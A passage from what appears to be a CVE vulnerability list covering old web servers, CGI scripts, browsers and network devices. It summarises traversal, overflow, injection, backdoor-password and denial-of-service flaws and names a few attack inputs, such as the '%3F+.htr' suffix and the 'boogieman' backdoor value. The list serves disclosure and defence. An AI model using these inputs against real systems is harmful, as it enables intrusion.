arbitrary files via a .. attack. [CVE-2001-0004] IIS 5.0 and 4.0 allows remote attackers to read the source code for executable web server programs by appending "%3F+.htr" to the requested URL, which causes the files to be parsed by the .HTR ISAPI extension, aka a variant of the "File Fragment Reading via .HTR" vulnerability. [CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability. [CVE-2000-1239] The HTTP interface of Tivoli Lightweight Client Framework (LCF) in IBM Tivoli Management Framework 3.7.1 sets http_disable to zero at install time, which allows remote authenticated users to bypass file permissions on Tivoli Endpoint Configuration data files via an unspecified manipulation of log files. [CVE-2000-1238] BEA Systems WebLogic Express and WebLogic Server 5.1 SP1-SP6 allows remote attackers to bypass access controls for restricted JSP or servlet pages via a URL with multiple / (forward slash) characters before the restricted pages. [CVE-2000-1230] Backdoor in auth.php3 in Phorum 3.0.7 allows remote attackers to access restricted web pages via an HTTP request with the PHP_AUTH_USER parameter set to "boogieman". [CVE-2000-1225] Xitami 2.5b installs the testcgi.exe program by default in the cgi-bin directory, which allows remote attackers to gain sensitive configuration information about the web server by accessing the program. [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant. [CVE-2000-1170] Buffer overflow in Netsnap webcam HTTP server before 1.2.9 allows remote attackers to execute arbitrary commands via a long GET request. [CVE-2000-1166] Twig webmail system does not properly set the "vhosts" variable if it is not configured on the site, which allows remote attackers to insert arbitrary PHP (PHP3) code by specifying an alternate vhosts as an argument to the index.php3 program. [CVE-2000-1161] The installation of AdCycle banner management system leaves the build.cgi program in a web-accessible directory, which allows remote attackers to execute the program and view passwords or delete databases. [CVE-2000-1155] RHDaemon in RobinHood 1.1 web server in BeOS r5 pro and earlier allows remote attackers to cause a denial of service via long HTTP request. [CVE-2000-1154] RHConsole in RobinHood 1.1 web server in BeOS r5 pro and earlier allows remote attackers to cause a denial of service via long HTTP request. [CVE-2000-1131] Bill Kendrick web site guestbook (GBook) allows remote attackers to execute arbitrary commands via shell metacharacters in the _MAILTO form variable. [CVE-2000-1130] McAfee WebShield SMTP 4.5 allows remote attackers to bypass email content filtering rules by including Extended ASCII characters in name of the attachment. [CVE-2000-1129] McAfee WebShield SMTP 4.5 allows remote attackers to cause a denial of service via a malformed recipient field. [CVE-2000-1118] 24Link 1.06 web server allows remote attackers to bypass access restrictions by prepending strings such as "/+/" or "/." to the HTTP GET request. [CVE-2000-1117] The Extended Control List (ECL) feature of the Java Virtual Machine (JVM) in Lotus Notes Client R5 allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method. [CVE-2000-1115] Buffer overflow in remote web administration component (webprox.dll) of 602Pro LAN SUITE before 2000.0.1.33 allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request. [CVE-2000-1110] document.d2w CGI program in the IBM Net.Data db2www package allows remote attackers to determine the physical path of the web server by sending a nonexistent command to the program. [CVE-2000-1105] The ixsso.query ActiveX Object is marked as safe for scripting, which allows malicious web site operators to embed a script that remotely determines the existence of files on visiting Windows 2000 systems that have Indexing Services enabled. [CVE-2000-1104] Variant of the "IIS Cross-Site Scripting" vulnerability as originally discussed in MS:MS00-060 (CVE-2000-0746) allows a malicious web site operator to embed scripts in a link to a trusted site, which are returned without quoting in an error message back to the client. The client then executes those scripts in the same context as the trusted site. [CVE-2000-1100] The default configuration for PostACI webmail system installs the /includes/global.inc configuration file within the web root, which allows remote attackers to read sensitive information such as database usernames and passwords via a direct HTTP GET request. [CVE-2000-1098] The web server for the SonicWALL SOHO firewall allows remote attackers to cause a denial of service via an empty GET or POST request. [CVE-2000-1097] The web server for the SonicWALL SOHO firewall allows remote attackers to cause a denial of service via a long username in the authentication page. [CVE-2000-1078] ICQ Web Front HTTPd allows remote attackers to cause a denial of service by requesting a URL that contains a "?" character. [CVE-2000-1077] Buffer overflow in the SHTML logging functionality of iPlanet Web Server 4.x allows remote attackers to execute arbitrary commands via a long filename with a .shtml extension. [CVE-2000-1070] pollit.cgi in Poll It 2.01 and earlier uses data files that are located under the web document root, which allows remote attackers to access sensitive or private information. [CVE-2000-1061] Microsoft Virtual Machine (VM) in Internet Explorer 4.x and 5.x allows an unsigned applet to create and use ActiveX controls, which allows a remote attacker to bypass Internet Explorer's security settings and execute arbitrary commands via a malicious web page or email, aka the "Microsoft VM ActiveX Component" vulnerability. [CVE-2000-1050] Allaire JRun 3.0 http servlet server allows remote attackers to directly access the WEB-INF directory via a URL request that contains an extra "/" in the beginning of the request (aka the "extra leading slash"). [CVE-2000-1036] Directory traversal vulnerability in Extent RBS ISP web server allows remote attackers to read sensitive information via a .. (dot dot) attack on the Image parameter. [CVE-2000-1032] The client authentication interface for Check Point Firewall-1 4.0 and earlier generates different error messages for invalid usernames versus invalid passwords, which allows remote attackers to identify valid usernames on the firewall. [CVE-2000-1030] CS&T CorporateTime for the Web returns different error messages for invalid usernames and invalid passwords, which allows remote attackers to determine valid usernames on the server. [CVE-2000-1021] Heap overflow in WebConfig in Mdaemon 3.1.1 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long URL. [CVE-2000-1017] Webteachers Webdata allows remote attackers with valid Webdata accounts to read arbitrary files by posting a request to import the file into the WebData database. [CVE-2000-1005] Directory traversal vulnerability in html_web_store.cgi and web_store.cgi CGI programs in eXtropia WebStore allows remote attackers to read arbitrary files via a .. (dot dot) attack on the page parameter. [CVE-2000-0988] WinU 1.0 through 5.1 has a backdoor password that allows remote attackers to gain access to its administrative interface and modify configuration. [CVE-2000-0982] Internet Explorer before 5.5 forwards cached user credentials for a secure web site to insecure pages on the same web site, which could allow remote attackers to obtain the credentials by monitoring connections to the web server, aka the "Cached Web Credentials" vulnerability. [CVE-2000-0970] IIS 4.0 and 5.0 .ASP pages send the same Session ID cookie for secure and insecure web sessions, which could allow remote attackers to hijack the secure web session of the user if that user moves to an insecure session, aka the "Session ID Cookie Marking" vulnerability. [CVE-2000-0964] Buffer overflow in the web administration service for the HiNet LP5100 IP-phone allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request. [CVE-2000-0958] HotJava Browser 3.0 allows remote attackers to access the DOM of a web page by opening a javascript: URL in a named window. [CVE-2000-0951] A misconfiguration in IIS 5.0 with Index Server enabled and the Index property set allows remote attackers to list directories in the web root via a Web Distributed Authoring and Versioning (WebDAV) search. [CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability. [CVE-2000-0941] Kootenay Web KW Whois 1.0 CGI program allows remote attackers to execute arbitrary commands via shell metacharacters in the "whois" parameter. [CVE-2000-0939] Samba Web Administration Tool (SWAT) in Samba 2.0.7 allows remote attackers to cause a denial of service by repeatedly submitting a nonstandard URL in the GET HTTP request and forcing it to restart. [CVE-2000-0938] Samba Web Administration Tool (SWAT) in Samba 2.0.7 supplies a different error message when a valid username is provided versus an invalid name, which allows remote attackers to identify valid users on the server. [CVE-2000-0937] Samba Web Administration Tool (SWAT) in Samba 2.0.7 does not log login attempts in which the username is correct but the password is wrong, which allows remote attackers to conduct brute force password guessing attacks. [CVE-2000-0936] Samba Web Administration Tool (SWAT) in Samba 2.0.7 installs the cgi.log logging file with world readable permissions, which allows local users to read sensitive information such as user names and passwords. [CVE-2000-0935] Samba Web Administration Tool (SWAT) in Samba 2.0.7 allows local users to overwrite arbitrary files via a symlink attack on the cgi.log file. [CVE-2000-0922] Directory traversal vulnerability in Bytes Interactive Web Shopper shopping cart program (shopper.cgi) 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) attack on the newpage parameter. [CVE-2000-0920] Directory traversal vulnerability in BOA web server 0.94.8.2 and earlier allows remote attackers to read arbitrary files via a modified .. (dot dot) attack in the GET HTTP request that uses a "%2E" instead of a "." [CVE-2000-0905] QNX Embedded Resource Manager in Voyager web server 2.01B in the demo disks for QNX 405 allows remote attackers to read sensitive system statistics information via the embedded.html web page. [CVE-2000-0904] Voyager web server 2.01B in the demo disks for QNX 405 stores sensitive web client information in the .photon directory in the web document root, which allows remote attackers to obtain that information. [CVE-2000-0903] Directory traversal vulnerability in Voyager web server 2.01B in the demo disks for QNX 405 allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2000-0892] Some telnet clients allow remote telnet servers to request environment variables from the client that may contain sensitive information, or remote web servers to obtain the information via a telnet: URL. [CVE-2000-0886] IIS 5.0 allows remote attackers to execute arbitrary commands via a malformed request for an executable file whose name is appended with operating system commands, aka the "Web Server File Request Parsing" vulnerability. [CVE-2000-0884] IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability. [CVE-2000-0873] netstat in AIX 4.x.x does not properly restrict access to the -Zi option, which allows local users to clear network interface statistics and possibly hide evidence of unusual network activities. [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method. [CVE-2000-0862] Vulnerability in an administrative interface utility for Allaire Spectra 1.0.1 allows remote attackers to read and modify sensitive configuration information. [CVE-2000-0859] The web configuration server for NTMail V5 and V6 allows remote attackers to cause a denial of service via a series of partial HTTP requests. [CVE-2000-0848] Buffer overflow in IBM WebSphere web application server (WAS) allows remote attackers to execute arbitrary commands via a long Host: request header. [CVE-2000-0842] The search97cgi/vtopic" in the UnixWare 7 scohelphttp webserver allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2000-0836] Buffer overflow in CamShot WebCam Trial2.6 allows remote attackers to execute arbitrary commands via a long Authorization header. [CVE-2000-0830] annclist.exe in webTV for Windows allows remote attackers to cause a denial of service by via a large, malformed UDP packet to ports 22701 through 22705. [CVE-2000-0827] Buffer overflow in the web authorization form of Mobius DocumentDirect for the Internet 1.2 allows remote attackers to cause a denial of service or execute arbitrary commands via a long username. [CVE-2000-0812] The administration module in Sun Java web server allows remote attackers to execute arbitrary commands by uploading Java code to the module and invoke the com.sun.server.http.pagecompile.jsp92.JspServlet by requesting a URL that begins with a /servlet/ tag. [CVE-2000-0790] The web-based folder display capability in Microsoft Internet Explorer 5.5 on Windows 98 allows local users to insert Trojan horse programs by modifying the Folder.htt file and using the InvokeVerb method in the ShellDefView ActiveX control to specify a default execute option for the first file that is listed in the folder. [CVE-2000-0787] IRC Xchat client versions 1.4.2 and earlier allows remote attackers to execute arbitrary commands by encoding shell metacharacters into a URL which XChat uses to launch a web browser. [CVE-2000-0780] The web server in IPSWITCH IMail 6.04 and earlier allows remote attackers to read and delete arbitrary files via a .. (dot dot) attack. [CVE-2000-0774] The sample Java servlet "test" in Bajie HTTP web server 0.30a reveals the real pathname of the web document root. [CVE-2000-0773] Bajie HTTP web server 0.30a allows remote attackers to read arbitrary files via a URL that contains a "....", a variant of the dot dot directory traversal attack. [CVE-2000-0769] O'Reilly WebSite Pro 2.3.7 installs the uploader.exe program with execute permissions for all users, which allows remote attackers to create and execute arbitrary files by directly calling uploader.exe. [CVE-2000-0746] Vulnerabilities in IIS 4.0 and 5.0 do not properly protect against cross-site scripting (CSS) attacks. They allow a malicious web site operator to embed scripts in a link to a trusted site, which are returned without quoting in an error message back to the client. The client then executes those scripts in the same context as the trusted site, aka the "IIS Cross-Site Scripting" vulnerabilities. [CVE-2000-0738] WebShield SMTP 4.5 allows remote attackers to cause a denial of service by sending e-mail with a From: address that has a . (period) at the end, which causes WebShield to continuously send itself copies of the e-mail. [CVE-2000-0727] xpdf PDF viewer client earlier than 0.91 does not properly launch a web browser for embedded URL's, which allows an attacker to execute arbitrary commands via a URL that contains shell metacharacters. [CVE-2000-0716] WorldClient email client in MDaemon 2.8 includes the session ID in the referer field of an HTTP request when the user clicks on a URL, which allows the visited web site to hijcak the session ID and read the user's email. [CVE-2000-0707] PCCS MySQLDatabase Admin Tool Manager 1.2.4 and earlier installs the file dbconnect.inc within the web root, which allows remote attackers to obtain sensitive information such as the administrative password. [CVE-2000-0706] Buffer overflows in ntop running in web mode allows remote attackers to execute arbitrary commands. [CVE-2000-0705] ntop running in web mode allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2000-0700] Cisco Gigabit Switch Routers (GSR) with Fast Ethernet / Gigabit Ethernet cards, from IOS versions 11.2(15)GS1A up to 11.2(19)GS0.2 and some versions of 12.0, do not properly handle line card failures, which allows remote attackers to bypass ACLs or force the interface to stop forwarding packets. [CVE-2000-0685] BEA WebLogic 5.1.x does not properly restrict access to the PageCompileServlet, which could allow remote attackers to compile and execute Java JHTML code by directly invoking the servlet on any source file. [CVE-2000-0684] BEA WebLogic 5.1.x does not properly restrict access to the JSPServlet, which could allow remote attackers to compile and execute Java JSP code by directly invoking the servlet on any source file. [CVE-2000-0683] BEA WebLogic 5.1.x allows remote attackers to read source code for parsed pages by inserting /.shtml/ into the URL, which invokes the SSIServlet. [CVE-2000-0682] BEA WebLogic 5.1.x allows remote attackers to read source code for parsed pages by inserting /ConsoleHelp/ into the URL, which invokes the FileServlet. [CVE-2000-0681] Buffer overflow in BEA WebLogic server proxy plugin allows remote attackers to execute arbitrary commands via a long URL with a .JSP extension. [CVE-2000-0671] Roxen web server earlier than 2.0.69 allows allows remote attackers to bypass access restrictions, list directory contents, and read source code by inserting a null character (%00) to the URL. [CVE-2000-0670] The cvsweb CGI script in CVSWeb 1.80 allows remote attackers with write access to a CVS repository to execute arbitrary commands via shell metacharacters. [CVE-2000-0660] The WDaemon web server for WorldClient 2.1 allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2000-0652] IBM WebSphere allows remote attackers to read source code for executable web files by directly calling the default InvokerServlet using a URL which contains the "/servlet/file" string. [CVE-2000-0649] IIS 4.0 allows remote attackers to obtain the internal IP address of the server via an HTTP 1.0 request for a web page which is protected by basic authentication and has no realm defined. [CVE-2000-0643] Buffer overflow in WebActive HTTP Server 1.00 allows remote attackers to cause a denial of service via a long URL. [CVE-2000-0642] The default configuration of WebActive HTTP Server 1.00 stores the web access log active.log in the document root, which allows remote attackers to view the logs by directly requesting the page. [CVE-2000-0641] Savant web server allows remote attackers to execute arbitrary commands via a long GET request. [CVE-2000-0639] The default configuration of Big Brother 1.4h2 and earlier does not include proper access restrictions, which allows remote attackers to execute arbitrary commands by using bbd to upload a file whose extension will cause it to be executed as a CGI script by the web server. [CVE-2000-0632] Buffer overflow in the web archive component of L-Soft Listserv 1.8d and earlier allows remote attackers to execute arbitrary commands via a long query string. [CVE-2000-0629] The default configuration of the Sun Java web server 2.0 and earlier allows remote attackers to execute arbitrary commands by uploading Java code to the server via board.html, then directly calling the JSP compiler servlet. [CVE-2000-0626] Buffer overflow in Alibaba web server allows remote attackers to cause a denial of service via a long GET request. [CVE-2000-0623] Buffer overflow in O'Reilly WebSite Professional web server 2.4 and earlier allows remote attackers to execute arbitrary commands via a long GET request or Referrer header. [CVE-2000-0622] Buffer overflow in Webfind CGI program in O'Reilly WebSite Professional web server 2.x allows remote attackers to execute arbitrary commands via a URL containing a long "keywords" parameter. [CVE-2000-0611] The default configuration of NetWin dMailWeb and cwMail trusts all POP servers, which allows attackers to bypass normal authentication and cause a denial of service. [CVE-2000-0610] NetWin dMailWeb and cwMail 2.6g and earlier allows remote attackers to bypass authentication and use the server for mail relay via a username that contains a carriage return. [CVE-2000-0609] NetWin dMailWeb and cwMail 2.6g and earlier allows remote attackers to cause a denial of service via a long username parameter. [CVE-2000-0608] NetWin dMailWeb and cwMail 2.6i and earlier allows remote attackers to cause a denial of service via a long POP parameter (pophost). [CVE-2000-0576] Oracle Web Listener for AIX versions 4.0.7.0.0 and 4.0.8.1.0 allows remote attackers to cause a denial of service via a malformed URL. [CVE-2000-0571] LocalWEB HTTP server 1.2.0 allows remote attackers to cause a denial of service via a long GET request. [CVE-2000-0569] Sybergen Sygate allows remote attackers to cause a denial of service by sending a malformed DNS UDP packet to its internal interface. [CVE-2000-0564] The guestbook CGI program in ICQ Web Front service for ICQ 2000a, 99b, and others allows remote attackers to cause a denial of service via a URL with a long name parameter. [CVE-2000-0563] The URLConnection function in MacOS Runtime Java (MRJ) 2.1 and earlier and the Microsoft virtual machine (VM) for MacOS allows a malicious web site operator to connect to arbitrary hosts using a HTTP redirection, in violation of the Java security model. [CVE-2000-0561] Buffer overflow in WebBBS 1.15 allows remote attackers to execute arbitrary commands via a long HTTP GET request. [CVE-2000-0552] ICQwebmail client for ICQ 2000A creates a world readable temporary file during login and does not delete it, which allows local users to obtain sensitive information. [CVE-2000-0521] Savant web server allows remote attackers to read source code of CGI scripts via a GET request that does not include the HTTP version number. [CVE-2000-0517] Netscape 4.73 and earlier does not properly warn users about a potentially invalid certificate if the user has previously accepted the certificate for a different web site, which could allow remote attackers to spoof a legitimate web site by compromising that site's DNS information. [CVE-2000-0507] Imate Webmail Server 2.5 allows remote attackers to cause a denial of service via a long HELO command. [CVE-2000-0503] The IFRAME of the WebBrowser control in Internet Explorer 5.01 allows a remote attacker to violate the cross frame security policy via the NavigateComplete2 event. [CVE-2000-0500] The default configuration of BEA WebLogic 5.1.0 allows a remote attacker to view source code of programs by requesting a URL beginning with /file/, which causes the default servlet to display the file without further processing. [CVE-2000-0499] The default configuration of BEA WebLogic 3.1.8 through 4.5.1 allows a remote attacker to view source code of a JSP program by requesting a URL which provides the JSP extension in upper case. [CVE-2000-0497] IBM WebSphere server 3.0.2 allows a remote attacker to view source code of a JSP program by requesting a URL which provides the JSP extension in upper case. [CVE-2000-0469] Selena Sol WebBanner 4.0 allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2000-0448] The WebShield SMTP Management Tool version 4.5.44 does not properly restrict access to the management port when an IP address does not resolve to a hostname, which allows remote attackers to access the configuration via the GET_CONFIG command. [CVE-2000-0447] Buffer overflow in WebShield SMTP 4.5.44 allows remote attackers to execute arbitrary commands via a long configuration parameter to the WebShield remote management service. [CVE-2000-0444] HP Web JetAdmin 6.0 allows remote attackers to cause a denial of service via a malformed URL to port 8000. [CVE-2000-0439] Internet Explorer 4.0 and 5.0 allows a malicious web site to obtain client cookies from another domain by including that domain name and escaped characters in a URL, aka the "Unauthorized Cookie Access" vulnerability. [CVE-2000-0437] Buffer overflow in the CyberPatrol daemon "cyberdaemon" used in gauntlet and WebShield allows remote attackers to cause a denial of service or execute arbitrary commands. [CVE-2000-0435] The allmanageup.pl file upload CGI script in the Allmanage Website administration software 2.6 can be called directly by remote attackers, which allows them to modify user accounts or web pages. [CVE-2000-0434] The administrative password for the Allmanage web site administration software is stored in plaintext in a file which could be accessed by remote attackers. [CVE-2000-0425] Buffer overflow in the Web Archives component of L-Soft LISTSERV 1.8 allows remote attackers to execute arbitrary commands. [CVE-2000-0423] Buffer overflow in Netwin DNEWSWEB CGI program allows remote attackers to execute arbitrary commands via long parameters such as group, cmd, and utag. [CVE-2000-0422] Buffer overflow in Netwin DMailWeb CGI program allows remote attackers to execute arbitrary commands via a long utoken parameter. [CVE-2000-0417] The HTTP administration interface to the Cayman 3220-H DSL router allows remote attackers to cause a denial of service via a long username or password. [CVE-2000-0416] NTMail 5.x allows network users to bypass the NTMail proxy restrictions by redirecting their requests to NTMail's web configuration server. [CVE-2000-0406] Netscape Communicator before version 4.73 and Navigator 4.07 do not properly validate SSL certificates, which allows remote attackers to steal information by redirecting traffic from a legitimate web server to their own malicious server, aka the "Acros-Suencksen SSL" vulnerability. [CVE-2000-0397] The EMURL web-based email account software encodes predictable identifiers in user session URLs, which allows a remote attacker to access a user's email account. [CVE-2000-0396] The add.exe program in the Carello shopping cart software allows remote attackers to duplicate files on the server, which could allow the attacker to read source code for web scripts such as .ASP files. [CVE-2000-0386] FileMaker Pro 5 Web Companion allows remote attackers to send anonymous or forged email. [CVE-2000-0385] FileMaker Pro 5 Web Companion allows remote attackers to bypass Field-Level database security restrictions via the XML publishing or email capabilities. [CVE-2000-0353] Pine 4.x allows a remote attacker to execute arbitrary commands via an index.html file which executes lynx and obtains a uudecoded file from a malicious web server, which is then executed by Pine. [CVE-2000-0346] AppleShare IP 6.1 and later allows a remote attacker to read potentially sensitive information via an invalid range request to the web server. [CVE-2000-0313] Vulnerability in OpenBSD 2.6 allows a local user to change interface media configurations. [CVE-2000-0302] Microsoft Index Server allows remote attackers to view the source code of ASP files by appending a %20 to the filename in the CiWebHitsFile argument to the null.htw URL. [CVE-2000-0299] Buffer overflow in WebObjects.exe in the WebObjects Developer 4.5 package allows remote attackers to cause a denial of service via an HTTP request with long headers such as Accept. [CVE-2000-0292] The Adtran MX2800 M13 Multiplexer allows remote attackers to cause a denial of service via a ping flood to the Ethernet interface, which causes the device to crash. [CVE-2000-0290] Buffer overflow in Webstar HTTP server allows remote attackers to cause a denial of service via a long GET request. [CVE-2000-0289] IP masquerading in Linux 2.2.x allows remote attackers to route UDP packets through the internal interface by modifying the external source IP address and port number to match those of an established connection. [CVE-2000-0282] TalentSoft webpsvr daemon in the Web+ shopping cart application allows remote attackers to read arbitrary files via a .. (dot dot) attack on the webplus CGI program. [CVE-2000-0278] The SalesLogix Eviewer allows remote attackers to cause a denial of service by accessing the URL for the slxweb.dll administration program, which does not authenticate the user. [CVE-2000-0261] The AVM KEN! web server allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2000-0257] Buffer overflow in the NetWare remote web administration utility allows remote attackers to cause a denial of service or execute commands via a long URL. [CVE-2000-0256] Buffer overflows in htimage.exe and Imagemap.exe in FrontPage 97 and 98 Server Extensions allow a user to conduct activities that are not otherwise available through the web site, aka the "Server-Side Image Map Components" vulnerability. [CVE-2000-0251] HP-UX 11.04 VirtualVault (VVOS) sends data to unprivileged processes via an interface that has multiple aliased IP addresses. [CVE-2000-0248] The web GUI for the Linux Virtual Server (LVS) software in the Red Hat Linux Piranha package has a backdoor password that allows remote attackers to execute arbitrary commands. [CVE-2000-0239] Buffer overflow in the MERCUR WebView WebMail server allows remote attackers to cause a denial of service via a long mail_user parameter in the GET request. [CVE-2000-0238] Buffer overflow in the web server for Norton AntiVirus for Internet Email Gateways allows remote attackers to cause a denial of service via a long URL. [CVE-2000-0237] Netscape Enterprise Server with Web Publishing enabled allows remote attackers to list arbitrary directories via a GET request for the /publisher directory, which provides a Java applet that allows the attacker to browse the directories. [CVE-2000-0236] Netscape Enterprise Server with Directory Indexing enabled allows remote attackers to list server directories via web publishing tags such as ?wp-ver-info and ?wp-cs-dump. [CVE-2000-0209] Buffer overflow in Lynx 2.x allows remote attackers to crash Lynx and possibly execute commands via a long URL in a malicious web page. [CVE-2000-0182] iPlanet Web Server 4.1 allows remote attackers to cause a denial of service via a large number of GET commands, which consumes memory and causes a kernel panic. [CVE-2000-0175] Buffer overflow in StarOffice StarScheduler web server allows remote attackers to gain root access via a long GET command. [CVE-2000-0174] StarOffice StarScheduler web server allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2000-0169] Batch files in the Oracle web listener ows-bin directory allow remote attackers to execute commands via a malformed URL that includes '?&'. [CVE-2000-0161] Sample web sites on Microsoft Site Server 3.0 Commerce Edition do not validate an identification number, which allows remote attackers to execute SQL commands. [CVE-2000-0156] Internet Explorer 4.x and 5.x allows remote web servers to access files on the client that are outside of its security domain, aka the "Image Source Redirect" vulnerability. [CVE-2000-0153] FrontPage Personal Web Server (PWS) allows remote attackers to read files via a .... (dot dot) attack. [CVE-2000-0149] Zeus web server allows remote attackers to view the source code for CGI programs via a null character (%00) at the end of a URL. [CVE-2000-0146] The Java Server in the Novell GroupWise Web Access Enhancement Pack allows remote attackers to cause a denial of service via a long URL to the servlet. [CVE-2000-0127] The Webspeed configuration program does not properly disable access to the WSMadmin utility, which allows remote attackers to gain privileges via wsisa.dll. [CVE-2000-0124] surfCONTROL SuperScout does not properly asign a category to web sites with a . (dot) at the end, which may allow users to bypass web access restrictions. [CVE-2000-0111] The RightFax web client uses predictable session numbers, which allows remote attackers to hijack user sessions. [CVE-2000-0110] The WebSiteTool shopping cart application allows remote users to modify sensitive purchase information via hidden form fields. [CVE-2000-0098] Microsoft Index Server allows remote attackers to determine the real path for a web directory via a request to an Internet Data Query file that does not exist. [CVE-2000-0097] The WebHits ISAPI filter in Microsoft Index Server allows remote attackers to read arbitrary files, aka the "Malformed Hit-Highlighting Argument" vulnerability. [CVE-2000-0094] procfs in BSD systems allows local users to gain root privileges by modifying the /proc/pid/mem interface via a modified file descriptor for stderr. [CVE-2000-0082] WebTV email client allows remote attackers to force the client to send email without the user's knowledge via HTML. [CVE-2000-0066] WebSite Pro allows remote attackers to determine the real pathname of webdirectories via a malformed URL request. [CVE-2000-0057] Cold Fusion CFCACHE tag places temporary cache files within the web document root, allowing remote attackers to obtain sensitive system information. [CVE-2000-0050] The Allaire Spectra Webtop allows authenticated users to access other Webtop sections by specifying explicit URLs. [CVE-2000-0043] Buffer overflow in CamShot WebCam HTTP server allows remote attackers to execute commands via a long GET request. [CVE-2000-0014] Denial of service in Savant web server via a null character in the requested URL. [CVE-2000-0010] WebWho+ whois.cgi program allows remote attackers to execute commands via shell metacharacters in the TLD parameter. [CVE-1999-1567] Seapine Software TestTrack server allows a remote attacker to cause a denial of service (high CPU) via (1) TestTrackWeb.exe and (2) ttcgi.exe by connecting to port 99 and disconnecting without sending any data. [CVE-1999-1547] Oracle Web Listener 2.1 allows remote attackers to bypass access restrictions by replacing a character in the URL with its HTTP-encoded (hex) equivalent. [CVE-1999-1531] Buffer overflow in IBM HomePagePrint 1.0.7 for Windows98J allows a malicious Web site to execute arbitrary code on a viewer's system via a long IMG_SRC HTML tag. [CVE-1999-1525] Macromedia Shockwave before 6.0 allows a malicious webmaster to read a user's mail box and possibly access internal web servers via the GetNextText command on a Shockwave movie. [CVE-1999-1523] Buffer overflow in Sambar Web Server 4.2.1 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP GET request. [CVE-1999-1522] Vulnerability in htmlparse.pike in Roxen Web Server 1.3.11 and earlier, possibly related to recursive parsing and referer tags in RXML. [CVE-1999-1509] Directory traversal vulnerability in Etype Eserv 2.50 web server allows a remote attacker to read any file in the file system via a .. (dot dot) in a URL. [CVE-1999-1508] Web server in Tektronix PhaserLink Printer 840.0 and earlier allows a remote attacker to gain administrator access by directly calling undocumented URLs such as ncl_items.html and ncl_subjects.html. [CVE-1999-1473] When a Web site redirects the browser to another site, Internet Explorer 3.02 and 4.0 automatically resends authentication information to the second site, aka the "Page Redirect Issue." [CVE-1999-1466] Vulnerability in Cisco routers versions 8.2 through 9.1 allows remote attackers to bypass access control lists when extended IP access lists are used on certain interfaces, the IP route cache is enabled, and the access list uses the "established" keyword. [CVE-1999-1465] Vulnerability in Cisco IOS 11.1 through 11.3 with distributed fast switching (DFS) enabled allows remote attackers to bypass certain access control lists when the router switches traffic from a DFS-enabled input interface to an output interface with a logical subinterface, as described by Cisco bug CSCdk43862. [CVE-1999-1464] Vulnerability in Cisco IOS 11.1CC and 11.1CT with distributed fast switching (DFS) enabled allows remote attackers to bypass certain access control lists when the router switches traffic from a DFS-enabled interface to an interface that does not have DFS enabled, as described by Cisco bug CSCdk35564. [CVE-1999-1453] Internet Explorer 4 allows remote attackers (malicious web site operators) to read the contents of the clipboard via the Internet WebBrowser ActiveX object. [CVE-1999-1423] ping in Solaris 2.3 through 2.6 allows local users to cause a denial of service (crash) via a ping request to a multicast address through the loopback interface, e.g. via ping -i. [CVE-1999-1418] ICQ99 ICQ web server build 1701 with "Active Homepage" enabled generates allows remote attackers to determine the existence of files on the server by comparing server responses when a file exists ("404 Forbidden") versus when a file does not exist ("404 not found"). [CVE-1999-1417] Format string vulnerability in AnswerBook2 (AB2) web server dwhttpd 3.1a4 allows remote attackers to cause a denial of service and possibly execute arbitrary commands via encoded % characters in an HTTP request, which is improperly logged. [CVE-1999-1416] AnswerBook2 (AB2) web server dwhttpd 3.1a4 allows remote attackers to cause a denial of service (resource exhaustion) via an HTTP POST request with a large content-length. [CVE-1999-1380] Symantec Norton Utilities 2.0 for Windows 95 marks the TUNEOCX.OCX ActiveX control as safe for scripting, which allows remote attackers to execute arbitrary commands via the run option through malicious web pages that are accessed by browsers such as Internet Explorer 3.0. [CVE-1999-1374] perlshop.cgi shopping cart program stores sensitive customer information in directories and files that are under the web root, which allows remote attackers to obtain that information via an HTTP request. [CVE-1999-1367] Internet Explorer 5.0 does not properly reset the username/password cache for Web sites that do not use standard cache controls, which could allow users on the same system to access restricted web sites that were visited by other users. [CVE-1999-1331] netcfg 2.16-1 in Red Hat Linux 4.2 allows the Ethernet interface to be controlled by users on reboot when an option is set, which allows local users to cause a denial of service by shutting down the interface. [CVE-1999-1292] Buffer overflow in web administration feature of Kolban Webcam32 4.8.3 and earlier allows remote attackers to execute arbitrary commands via a long URL. [CVE-1999-1287] Vulnerability in Analog 3.0 and earlier allows remote attackers to read arbitrary files via the forms interface. [CVE-1999-1277] BackWeb client stores the username and password in cleartext for proxy authentication in the Communication registry key, which could allow other local users to gain privileges by reading the password. [CVE-1999-1264] WebRamp M3 router does not disable remote telnet or HTTP access to itself, even when access has been expliticly disabled. [CVE-1999-1250] Vulnerability in CGI program in the Lasso application by Blue World, 